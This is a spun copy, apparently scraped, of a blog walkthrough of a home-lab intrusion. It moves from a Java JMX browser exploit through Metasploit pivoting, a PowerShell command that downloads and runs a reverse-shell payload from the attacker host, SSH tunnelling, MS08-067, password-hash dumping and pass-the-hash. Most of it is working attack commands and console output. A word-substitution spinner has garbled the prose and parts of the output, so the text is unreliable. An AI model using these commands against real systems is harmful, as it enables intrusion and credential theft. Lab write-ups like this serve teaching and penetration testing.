-->
Game Over: Scenario Based Infrastructure Hacktics

Game Over: Scenario Based Infrastructure Hacktics

Game Over: Scenario Based Infrastructure Hacktics

Hello together with welcome! Today I volition last walking yous through a scenario-based infrastructure hack. I am doing this for 2 reasons. (1) I was setting upwards some infrastructure tests inward my abode lab hence I mightiness equally good portion my efforts. (2) Showcasing client-side attacks equally an entry indicate to a corporate network. Me together with a distich of my colleagues were of late looking at the "Java Applet JMX Exploit" that was posted on pastebin here together with nosotros tested it out on a distich of VM's running IE8-10 (Win 7, Win 8), predictably all browsers poped calc. Today organisational perimeters are mostly good protected together with publicly available exploits simply don't hitting the proverbial mark. In my thought in that location are 2 entry points inward a corporate surroundings which pose to a greater extent than conduct chances than other assault vectors. (1) The spider web application infrastructure; the spider web is a genuinely complicated animate beingness together with amongst hence many technologies floating simply about mistakes hap (sqli, XSS, CSRF, broken authentication, SOAP logic errors, file upload, ascendance injection,...). (2) Client side attacks; targeted customer side attacks are extremely efficient, talented together with motivated attackers conduct maintain had a really high charge per unit of measurement of success (think of the carnage the Elderwood gang caused, delight bring some fourth dimension to read this).

Today nosotros volition run across how a compromised customer tin give the sack serve equally an entry indicate into the corporate network. We volition last using quite a few tactics to acchieve our goals similar metasploit pivoting, powershell, ssh tunneling together with pass-the-hash. Take a await at the network setup.

Network Layout:
Internet =>
192.168.44.1/24
Corporate Network =>
192.168.17.1/24

Clients:
H5N1 Attacker - BT5R3:
192.168.44.137
V1 Client - Win7 (Dual-Homed):
192.168.44.1 together with 192.168.17.1
V2 Legacy Web Server - XP SP1:
192.168.17.134
V3 Legacy Server - XP Pro SP3:
192.168.17.132

As I designed the lab I know precisely what vulnerabilities are present, today’s tutorial is mostly almost how the assailant tin give the sack propagate on the internal network. You volition also honour that I produce some things which aren't genuinely necessary but over again this is simply an chance to await at a multifariousness of techniques which are at the disposal of the attacker. Below yous tin give the sack run across a network diagram which should assist yous empathise the obstacles nosotros volition conduct maintain to overcome to accomplish our objectives (please forgive my pitiable Gimp skills!).

 Today I volition last walking yous through a scenario Game Over: Scenario Based Infrastructure Hacktics

V1 Client Side Foothold

Like I said earlier sophisticated attackers conduct maintain had dandy success at using customer side attacks to gain entry to the corporate network. Exploits such equally the recent Java JMX põrnikas offering such powerful weapons to the assailant amongst remote code execution across multiple browsers together with operating systems. H5N1 regular user may easily last tricked into browsing to a malicious link if he/she thinks the sender is trusted or is properly motivated. Time to launch our assault on the corporate network. First nosotros volition serve upwards the Java JMX exploit on our attackers box together with and hence nosotros volition essay to entice a pitiable employee to view our malicious website.
msf > search JMX  Matching Modules ================     Name                                      Disclosure Date  Rank       Description    ----                                      ---------------  ----       -----------    exploit/multi/browser/java_jre17_jmxbean  2013-01-10       first-class  Java Applet JMX Remote Code                                                                          Execution    exploit/multi/http/jboss_bshdeployer      2010-04-26       first-class  JBoss JMX Console Beanshell                                                                          Deployer WAR Upload together with                                                                          Deployment    exploit/multi/http/jboss_invoke_deploy    2007-02-20       first-class  JBoss DeploymentFileRepository                                                                          WAR Deployment (via                                                                          JMXInvokerServlet)    exploit/multi/http/jboss_maindeployer     2007-02-20       first-class  JBoss JMX Console Deployer                                                                          Upload together with Execute    exploit/multi/misc/java_rmi_server        2011-10-15       first-class  Java RMI Server Insecure                                                                          Default Configuration Java                                                                          Code Execution         msf  exploit(java_jre17_jmxbean) > show options  Module options (exploit/multi/browser/java_jre17_jmxbean):     Name        Current Setting  Required  Description    ----        ---------------  --------  -----------    SRVHOST     0.0.0.0          yeah       The local host to nous on. This must last an address on the                                           local machine or 0.0.0.0    SRVPORT     8080             yeah       The local port to nous on.    SSL         fake            no        Negotiate SSL for incoming connections    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)    SSLVersion  SSL3             no        Specify the version of SSL that should last used (accepted:                                           SSL2, SSL3, TLS1)    URIPATH     /JavaEveryday    no        The URI to utilization for this exploit (default is random)   Payload options (java/meterpreter/reverse_http):     Name   Current Setting  Required  Description    ----   ---------------  --------  -----------    LHOST  192.168.44.137   yeah       The local listener hostname    LPORT  8080             yeah       The local listener port   Exploit target:     Id  Name    --  ----    0   Generic (Java Payload)     msf  exploit(java_jre17_jmxbean) > exploit [*] Exploit running equally background job. [*] Started HTTP contrary handler on http://192.168.44.137:8080/ [*] Using URL: http://0.0.0.0:8080/JavaEveryday [*]  Local IP: http://192.168.44.137:8080/JavaEveryday [*] Server started.


All nosotros demand to produce at nowadays is fox the unsuspecting user (V1) into browsing to our website.

 Today I volition last walking yous through a scenario Game Over: Scenario Based Infrastructure Hacktics
Obviously this unsmooth exertion won't larn us really far but yous larn the thought right. H5N1 motivated assailant tin give the sack obfuscate the link together with arts and crafts a post service that looks similar it comes from a trusted source or render a seemingly compelling argue to view the website. This volition last the starting indicate for our infrastructure scenario.
msf  exploit(java_jre17_jmxbean) > exploit        [*] Exploit running equally background job. [*] Started HTTP contrary handler on http://192.168.44.137:8080/ [*] Using URL: http://0.0.0.0:8080/JavaEveryday [*]  Local IP: http://192.168.44.137:8080/JavaEveryday [*] Server started. [*] 192.168.44.1     java_jre17_jmxbean - treatment asking for /JavaEveryday/ [*] 192.168.44.1:58312 Request received for /favicon.ico... [*] 192.168.44.1:58312 Unknown asking to /favicon.ico GET /favicon.ico HTTP/1.1  Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 192.168.44.137:8080 Connection: Keep-Alive Content-Length: 0 ...  [*] 192.168.44.1     java_jre17_jmxbean - treatment asking for /JavaEveryday/eHRimLIo.jar [*] 192.168.44.1     java_jre17_jmxbean - treatment asking for /JavaEveryday/eHRimLIo.jar [*] 192.168.44.1:58314 Request received for /INITJM... [*] Meterpreter session 1 opened (192.168.44.137:8080 -> 192.168.44.1:58314) at 2013-01-18 20:50:07 +0000  msf  exploit(java_jre17_jmxbean) > sessions -l  Active sessions ===============    Id  Type                   Information     Connection   --  ----                   -----------     ----------   1   meterpreter java/java  b33f @ Trident  192.168.17.133:8080 -> 192.168.17.1:53650 (192.168.17.1)    msf  exploit(java_jre17_jmxbean) > sessions -i 1 [*] Starting interaction amongst 1...  meterpreter > sysinfo Computer    : Trident OS          : Windows seven 6.1 (x86) Meterpreter : java/java  meterpreter > getuid Server username: b33f  meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:\Users\b33f\Desktop>ipconfig ipconfig  Windows IP Configuration  Ethernet adapter VMware Network Adapter VMnet10:     Connection-specific DNS Suffix  . :     Link-local IPv6 Address . . . . . : fe80::15ce:3f81:aaf6:3173%16    IPv4 Address. . . . . . . . . . . : 192.168.17.1    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . :   Ethernet adapter VMware Network Adapter VMnet8:     Connection-specific DNS Suffix  . :     Link-local IPv6 Address . . . . . : fe80::a504:dea1:5746:e518%17    IPv4 Address. . . . . . . . . . . : 192.168.44.1    Subnet Mask . . . . . . . . . . . : 255.255.255.0    Default Gateway . . . . . . . . . : 


As nosotros tin give the sack run across from the meterpreter session our host is dual-homed together with volition probable give us access to additional non routable hosts on the corporate network. First all the same nosotros are going to supercede our existing java_meterpreter amongst a proper meterpreter. As some of yous volition know the java_meterpreter doesn't incorporate all the available functionality. It also gives me the chance to showcase to cool tricks: (1) Inline poweshell code execution together with (2) metasploit session upgrading. First nosotros volition laid upwards a spider web server to host our musical rhythm out together with and hence nosotros volition utilization powershell to download together with execute our payload.
root@bt: /Desktop# /etc/init.d/apache2 start  * Starting spider web server apache2  [ OK ]    root@bt: # netstat -atnp |grep apache2 Active Internet connections (servers together with established) Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program cry  tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1467/apache2  root@bt: # msfpayload windows/shell/reverse_tcp lport=9988 lhost=192.168.44.137 X > /var/www/funz.exe Created past times msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: {"lport"=>"9988", "lhost"=>"192.168.44.137"}  root@bt: # locate plink.exe /pentest/windows-binaries/tools/plink.exe  root@bt: # cp /pentest/windows-binaries/tools/plink.exe /var/www/  root@bt: /Desktop# ls -la /var/www/ full 2100 drwxr-xr-x  three root root    4096 2013-01-18 01:28 . drwxr-xr-x sixteen root root    4096 2011-06-08 14:51 .. -rw-r--r--  1 root root   73802 2013-01-18 01:27 funz.exe -rw-r--r--  1 root root     177 2011-05-10 17:01 index.html -rwxrw-rw-  1 root root 1667584 2011-06-30 14:52 ncat.exe -rwxrw-rw-  1 root root  381816 2010-04-27 12:04 PsExec.exe drwxr-xr-x  2 root root    4096 2011-05-10 17:01 wstool 


In add-on to our payload nosotros volition also last uploading plink.exe which is a ascendance describe version of Putty which volition allow us to create shh tunnels inward together with out of the corporate network should nosotros demand them.
# First nosotros volition background our meterpreter session (Ctrl+Z) till nosotros driblet dorsum into msfconsole together with laid upwards a # listener for our payload.        msf  exploit(java_jre17_jmxbean) > use multi/handler  msf  exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp  msf  exploit(handler) > set lport 9988 lport => 9988  msf  exploit(handler) > set lhost 192.168.44.137 lhost => 192.168.44.137  msf  exploit(handler) > exploit -j [*] Exploit running equally background job. [*] Started contrary handler on 192.168.44.137:9988  [*] Starting the payload handler...  # Ok at nowadays lets log dorsum into our master copy meterpreter sessions together with utilization powershell to download our files # together with execute our payload.  msf  exploit(handler) > sessions -i 1 [*] Starting interaction amongst 1...  meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:\Users\b33f\Desktop>md EvilHacker md EvilHacker  # This volition brand the folder hidden together with won't fifty-fifty demo upwards if "Show Hidden Files together with Folders" selection is # enabled.  C:\Users\b33f\Desktop>attrib +s +h "C:\Users\b33f\Desktop\EvilHacker" attrib +s +h "C:\Users\b33f\Desktop\EvilHacker"  C:\Users\b33f\Desktop>cd EvilHacker cd EvilHacker  # This is all inward i line  C:\Users\b33f\Desktop\EvilHacker>cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile ('http://192.168.44.137/funz.exe','funz.exe');(New-Object System.Net.WebClient).DownloadFile ('http://192.168.44.137/plink.exe','plink.exe');Start-Process 'funz.exe'"  # We similar a shot larn notified of the incoming musical rhythm out past times our handler.  [*] Encoded phase amongst x86/shikata_ga_nai [*] Sending encoded phase (267 bytes) to 192.168.44.1  C:\Users\b33f\Desktop\EvilHacker>^Z Background channel 1? [y/N]  y  meterpreter >  Background session 1? [y/N]  y  msf  exploit(handler) > sessions  Active sessions ===============  Id  Type                   Information     Connection --  ----                   -----------     ---------- 1   meterpreter java/java  b33f @ Trident  192.168.44.137:8080 -> 192.168.44.1:58314 (192.168.44.1) 2   musical rhythm out windows                          192.168.44.137:9988 -> 192.168.44.1:58736 (192.168.44.1)    # We tin give the sack utilization the "sessions -u" selection to upgrade our musical rhythm out to a proper meterpreter session.    msf  exploit(handler) > sessions -u 2  [*] Started contrary handler on 192.168.44.137:9988  [*] Starting the payload handler... [*] Command Stager progress - 1.66% done (1699/102108 bytes) [*] Command Stager progress - 3.33% done (3398/102108 bytes) [*] Command Stager progress - 4.99% done (5097/102108 bytes) [*] Command Stager progress - 6.66% done (6796/102108 bytes) [...Snip...] [*] Command Stager progress - 96.51% done (98542/102108 bytes) [*] Command Stager progress - 98.15% done (100216/102108 bytes) [*] Command Stager progress - 99.78% done (101888/102108 bytes) [*] Command Stager progress - 100.00% done (102108/102108 bytes)  msf  exploit(handler) > sessions  Active sessions ===============  Id  Type                   Information            Connection --  ----                   -----------            ---------- 1   meterpreter java/java  b33f @ Trident         192.168.44.137:8080 -> 192.168.44.1:58314 (192.168.44.1) 2   musical rhythm out windows                                 192.168.44.137:9988 -> 192.168.44.1:58736 (192.168.44.1) three   meterpreter x86/win32  Trident\b33f @ TRIDENT 192.168.44.137:9988 -> 192.168.44.1:58770 (192.168.44.1)  # Lets kill off the sessions nosotros don't demand anymore.   msf  exploit(handler) > sessions -k 1 [*] Killing session 1 [*] 192.168.44.1 - Meterpreter session 1 closed.  msf  exploit(handler) > sessions -k 2 [*] Killing session 2 [*] 192.168.44.1 - Command musical rhythm out session 2 closed.


As a concluding stride inward setting upwards our forrad base of operations of assault nosotros volition scan the internal non routable network for alive hosts together with add together a road to that network inward metasploit hence nosotros tin give the sack pin our attacks.
meterpreter > run arp_scanner -r 192.168.17.1/24 [*] ARP Scanning 192.168.17.1/24 [*] IP: 192.168.17.1 MAC 00:50:56:c0:00:01 [*] IP: 192.168.17.134 MAC 00:0c:29:33:39:21 [*] IP: 192.168.17.132 MAC 00:0c:29:71:74:f7  msf  exploit(handler) > route add together 192.168.17.1 255.255.255.0 3 [*] Route added  msf  exploit(handler) > route print  Active Routing Table ====================     Subnet             Netmask            Gateway    ------             -------            -------    192.168.17.1       255.255.255.0      Session 3


 Today I volition last walking yous through a scenario Game Over: Scenario Based Infrastructure Hacktics

V2 Legacy Web Server


As I mentioned earlier the corporate network perimeter is mostly good protected. That same diligence is (generally) non applied to the internal network for a multifariousness of reasons. Upgrading OS'es costs allot of money, patching may crusade downtime no i is willing to sign off on together with mostly people consider the internal network to last a security place. Enter our (unrealistic) XP SP1 legacy HTTP server running a vulnerable version of Kolibri. Since nosotros added a road to the corporate network inward msf nosotros tin give the sack at nowadays forrad our traffic through V1 to the non routable hosts.

msf  exploit(handler) > nmap -sS -T5 -v 192.168.17.134 [*] exec: nmap -sS -T5 -v 192.168.17.134  Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-01-18 21:25 GMT Initiating Ping Scan at 21:25 Scanning 192.168.17.134 [3 ports] Completed Ping Scan at 21:25, 0.01s elapsed (1 full hosts) Initiating Parallel DNS resolution of 1 host. at 21:25 Completed Parallel DNS resolution of 1 host. at 21:25, 0.03s elapsed Initiating SYN Stealth Scan at 21:25 Scanning 192.168.17.134 [1000 ports] Discovered opened upwards port 135/tcp on 192.168.17.134 Discovered opened upwards port 8080/tcp on 192.168.17.134 Discovered opened upwards port 1025/tcp on 192.168.17.134 Discovered opened upwards port 139/tcp on 192.168.17.134 Discovered opened upwards port 445/tcp on 192.168.17.134 Discovered opened upwards port 5000/tcp on 192.168.17.134 Completed SYN Stealth Scan at 21:25, 3.28s elapsed (1000 full ports) Nmap scan written report for 192.168.17.134 Host is upwards (1.0s latency).  PORT     STATE SERVICE 135/tcp  opened upwards  msrpc 139/tcp  opened upwards  netbios-ssn 445/tcp  opened upwards  microsoft-ds 1025/tcp opened upwards  NFS-or-IIS 5000/tcp opened upwards  upnp 8080/tcp opened upwards  http-proxy MAC Address: 00:0C:29:33:39:21 (VMware)  Read information files from: /opt/framework/share/nmap Nmap done: 1 IP address (1 host up) scanned inward 3.53 seconds            Raw packets sent: 1527 (67.164KB) | Rcvd: 543 (21.744KB)


H5N1 chip of service enumeration volition divulge that the http-proxy is genuinely Kolibri HTTP Server. You could tunnel out the port together with browse to the site or await at the raw dump when enumerating amongst amap but I leave of absence that upwards to the diligent reader to play with. There is already an exploit acquaint for Kolibri inward metasploit but it solely supports XP SP3. It literally took me v minutes commencement to goal to launch a debugger on a essay system, await for the appropriate addresses on SP1 together with modification the exploit inward metasploit accordingly.
msf  exploit(handler) > use exploit/windows/http/kolibri_http  msf  exploit(kolibri_http) > set rhost 192.168.17.134 rhost => 192.168.17.134  msf  exploit(kolibri_http) > set rport 8080 rport => 8080  # Take aid to laid a bind payload equally the host has no means to road dorsum to our attacker.  msf  exploit(kolibri_http) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp  msf  exploit(kolibri_http) > show options  Module options (exploit/windows/http/kolibri_http):     Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    Proxies                   no        Use a proxy chain    RHOST    192.168.17.134   yeah       The target address    RPORT    8080             yeah       The target port    VHOST                     no        HTTP server virtual host   Payload options (windows/meterpreter/bind_tcp):     Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  procedure          yeah       Exit technique: seh, thread, process, none    LPORT     4444             yeah       The nous port    RHOST     192.168.17.134   no        The target address   Exploit target:     Id  Name    --  ----    0   Windows XP sp3     msf  exploit(kolibri_http) > exploit  msf  exploit(handler) > sessions  Active sessions ===============  Id  Type                   Information                             Connection --  ----                   -----------                             ---------- three   meterpreter x86/win32  Trident\b33f @ TRIDENT                  192.168.44.137:9988                                                                     -> 192.168.44.1:58770 (192.168.44.1) 4   meterpreter x86/win32  B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5 192.168.44.137-192.168.44.1:0                                                                     -> 192.168.17.134:4444 (192.168.17.134)    msf  exploit(handler) > sessions -i 4 [*] Starting interaction amongst 4...  meterpreter > getuid Server username: B33F-URLVV9CUV5\user1  meterpreter > sysinfo Computer        : B33F-URLVV9CUV5 OS              : Windows XP (Build 2600, Service Pack 1). Architecture    : x86 System Language : en_US Meterpreter     : x86/win32  # Seems similar user1 is a depression privilege user together with won't last able to give us SYSTEM story access to the box  meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.  meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied.


At this indicate in that location are a distich of things nosotros could do. In metasploit nosotros could run "search exploit/windows/local" together with run i of the local privilege escalation exploits through our existing session or nosotros could straight exploit MS08_067 since nosotros already conduct maintain a road to the network. We volition last doing something a chip to a greater extent than complicated though to demonstrate the powerfulness of ssh tunneling. We volition tunnel out port 445 on the remote host all the means dorsum to our assailant together with and hence launch MS08_067 on our local box through the tunnel to V2 together with larn a musical rhythm out back. This representative is a chip contrived but in that location are cases where ssh tunneling volition salve yous skin. Since V1 tin give the sack road connections to our assailant together with to V2 nosotros volition last using V1 equally the span for our tunnel.
# First commencement your ssh server on BackTrack.  root@bt: # /etc/init.d/ssh start Rather than invoking init scripts through /etc/init.d, utilization the service(8) utility, e.g. service ssh commencement  Since the script yous are attempting to invoke has been converted to an Upstart job, yous may also utilization the start(8) utility, e.g. commencement ssh ssh start/running, procedure 4985  # Drop dorsum into a musical rhythm out on V1 together with commencement the tunnel. It volition await similar yous driblet out of metasploit dorsum # into a terminal but thats normal since yous opening a ssh shell. # # Tunnel Syntax: plink -l username -pw "password" -R attacker_port:victim_ip:victim_port attacker_ip  C:\Users\b33f\Desktop\EvilHacker>plink -l root -pw "s3cr3tpa$$word" -R 445:192.168.17.134:445 192.168.44.137 plink -l root -pw "s3cr3tpa$$word" -R 445:192.168.17.134:445 192.168.44.137  Linux bt 3.2.6 #1 SMP Friday February 17 10:40:05 EST 2012 i686 GNU/Linux    System information equally of Sabbatum January xix 19:56:44 GMT 2013    System load:  0.01               Processes:           130   Usage of /:   28.6% of 47.82GB   Users logged in:     1   Memory usage: 16%                IP address for eth0: 192.168.44.137   Swap usage:   0%    Graph this information together with create produce this scheme at https://landscape.canonical.com/ Last login: Sabbatum January xix 19:25:22 2013 from 192.168.44.1  root@bt: # netstat -antp |grep 445 netstat -antp |grep 445 tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN      3486/2           tcp6       0      0 ::1:445                 :::*                    LISTEN      3486/2  # In a novel terminal opened upwards up msfconsole. First nosotros volition position the opperating scheme to verify the tunnel # plant (could also last done amongst nmap script scan or enum4linux) together with and hence nosotros volition launch a meterpreter # bind payload through the tunnel.  msf  exploit(ms08_067_netapi) > use scanner/smb/smb_version  msf  auxiliary(smb_version) > show options  Module options (auxiliary/scanner/smb/smb_version):     Name       Current Setting  Required  Description    ----       ---------------  --------  -----------    RHOSTS                      yeah       The target address arrive at or CIDR identifier    SMBDomain  WORKGROUP        no        The Windows domain to utilization for authentication    SMBPass                     no        The password for the specified username    SMBUser                     no        The username to authenticate equally    THREADS    1                yeah       The number of concurrent threads  msf  auxiliary(smb_version) > set rhosts 127.0.0.1 rhosts => 127.0.0.1  msf  auxiliary(smb_version) > exploit  [*] 127.0.0.1:445 is running Windows XP Service Pack 0 / 1 (language: English) (name:B33F-URLVV9CUV5)                                                                                (domain:WORKGROUP) [-] 127.0.0.1: ActiveRecord::RecordInvalid Validation failed: Address is reserved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed  msf > search ms08_067  Matching Modules ================     Name                                 Disclosure Date          Rank   Description    ----                                 ---------------          ----   -----------    exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  dandy  Microsoft Server Service Relative                                                                         Path Stack Corruption # Take aid to laid rhost to 127.0.0.1.  msf > use exploit/windows/smb/ms08_067_netapi  msf  exploit(ms08_067_netapi) > show options  Module options (exploit/windows/smb/ms08_067_netapi):     Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST    127.0.0.1        yeah       The target address    RPORT    445              yeah       Set the SMB service port    SMBPIPE  BROWSER          yeah       The pipage cry to utilization (BROWSER, SRVSVC)   Payload options (windows/meterpreter/bind_tcp):     Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  thread           yeah       Exit technique: seh, thread, process, none    LPORT     4444             yeah       The nous port    RHOST     127.0.0.1        no        The target address   Exploit target:     Id  Name    --  ----    2   Windows XP SP0/SP1 Universal   msf  exploit(ms08_067_netapi) > exploit  [*] Started bind handler [*] Attempting to trigger the vulnerability...  # We won't larn equally musical rhythm out equally nosotros are launching the assault on our localhost but lets become dorsum to our tunnel,  # unopen it together with background till nosotros are dorsum inward msfconsole.  root@bt: # exit larn out logout Using username "root".  C:\Users\b33f\Desktop>^Z Background channel 1? [y/N]  y  meterpreter >  Background session 4? [y/N]  # Set upwards a handler for the meterpreter bind musical rhythm out that is waiting for us.  msf  exploit(handler) > show options  Module options (exploit/multi/handler):     Name  Current Setting  Required  Description    ----  ---------------  --------  -----------   Payload options (windows/meterpreter/bind_tcp):     Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  procedure          yeah       Exit technique: seh, thread, process, none    LPORT     4444             yeah       The nous port    RHOST     192.168.17.134   no        The target address   Exploit target:     Id  Name    --  ----    0   Wildcard Target   msf  exploit(handler) > exploit  [*] Started bind handler [*] Starting the payload handler... [*] Sending phase (752128 bytes) to 192.168.17.134  meterpreter >  Background session 5? [y/N]    # As yous tin give the sack run across nosotros at nowadays conduct maintain SYSTEM story access to V2.  msf  exploit(handler) > sessions  Active sessions ===============  Id  Type                   Information                             Connection --  ----                   -----------                             ---------- three   meterpreter x86/win32  Trident\b33f @ TRIDENT                  192.168.44.137:9988                                                                     -> 192.168.44.1:58770 (192.168.44.1) 4   meterpreter x86/win32  B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5 192.168.44.137-192.168.44.1:0                                                                     -> 192.168.17.134:4444 (192.168.17.134) 5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ B33F-URLVV9CUV5   192.168.44.137:46585                                                                     -> 192.168.17.134:4444 (192.168.17.134)    meterpreter > getuid Server username: NT AUTHORITY\SYSTEM  meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:17e6ed3ae4ea6164cf94ce448039c13b:1834e6a12f358bd93bfdd45b5395eea1::: Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:69be3606bb00c489551eb44859048a8c::: user1:1004:e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::


 Today I volition last walking yous through a scenario Game Over: Scenario Based Infrastructure Hacktics

V3 Legacy Server


For our concluding host nosotros volition await at some other mutual effect on internal networks. Often a workstation or server is installed together with and hence a snapshot is taken hence the configuration tin give the sack easily last replicated to other hosts. This is of course of teaching a major issue! When nosotros compromise a host together with dump the password hashes of the users nosotros tin give the sack utilization those to essay to authenticated to other hosts on the network. Lets essay to utilization the hashes nosotros recovered from V2 to authenticate against V3.
msf  exploit(psexec) > show options  Module options (exploit/windows/smb/psexec):     Name       Current Setting           Required  Description    ----       ---------------           --------  -----------    RHOST      192.168.17.132            yeah       The target address    RPORT      445                       yeah       Set the SMB service port    SHARE      ADMIN$                    yeah       The portion to connect to, tin give the sack last an admin portion (ADMIN$,                                                   C$,...) or a normal read/write folder portion    SMBDomain  WORKGROUP                 no        The Windows domain to utilization for authentication    SMBPass    aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                         no        The password for the specified username    SMBUser    Administrator             no        The username to authenticate equally   Payload options (windows/meterpreter/bind_tcp):     Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  procedure          yeah       Exit technique: seh, thread, process, none    LPORT     5566             yeah       The nous port    RHOST     192.168.17.132   no        The target address   Exploit target:     Id  Name    --  ----    0   Automatic     msf  exploit(psexec) > exploit  [*] Connecting to the server... [*] Started bind handler [*] Authenticating to 192.168.17.132:445|WORKGROUP equally user 'Administrator'... [*] Uploading payload... [*] Created \OkddXwLq.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.17.132[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.17.132[\svcctl] ... [*] Obtaining a service director handle... [*] Creating a novel service (HRyeauAf - "MRhLxJcCrdBvQlOSnQSjdnYROxRe")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Sending phase (752128 bytes) [*] Deleting \OkddXwLq.exe... [*] Meterpreter session vi opened (192.168.44.137-192.168.44.1:0 -> 192.168.17.132:5566)      at 2013-01-19 21:22:04 +0000  meterpreter > getuid Server username: NT AUTHORITY\SYSTEM  meterpreter >  Background session 6? [y/N]    msf  exploit(psexec) > sessions Active sessions ===============    Id  Type                   Information                              Connection   --  ----                   -----------                              ----------   three   meterpreter x86/win32  Trident\b33f @ TRIDENT                   192.168.44.137:9988                                                                        -> 192.168.44.1:58770 (192.168.44.1)   4   meterpreter x86/win32  B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5  192.168.44.137-192.168.44.1:0                                                                        -> 192.168.17.134:4444 (192.168.17.134)   5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ B33F-URLVV9CUV5    192.168.44.137:46585                                                                        -> 192.168.17.134:4444 (192.168.17.134)   vi   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ B33F-E95CE571A1    192.168.44.137-192.168.44.1:0                                                                        -> 192.168.17.132:5566 (192.168.17.132)    msf  exploit(psexec) > ...Game Over...


 Today I volition last walking yous through a scenario Game Over: Scenario Based Infrastructure Hacktics
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser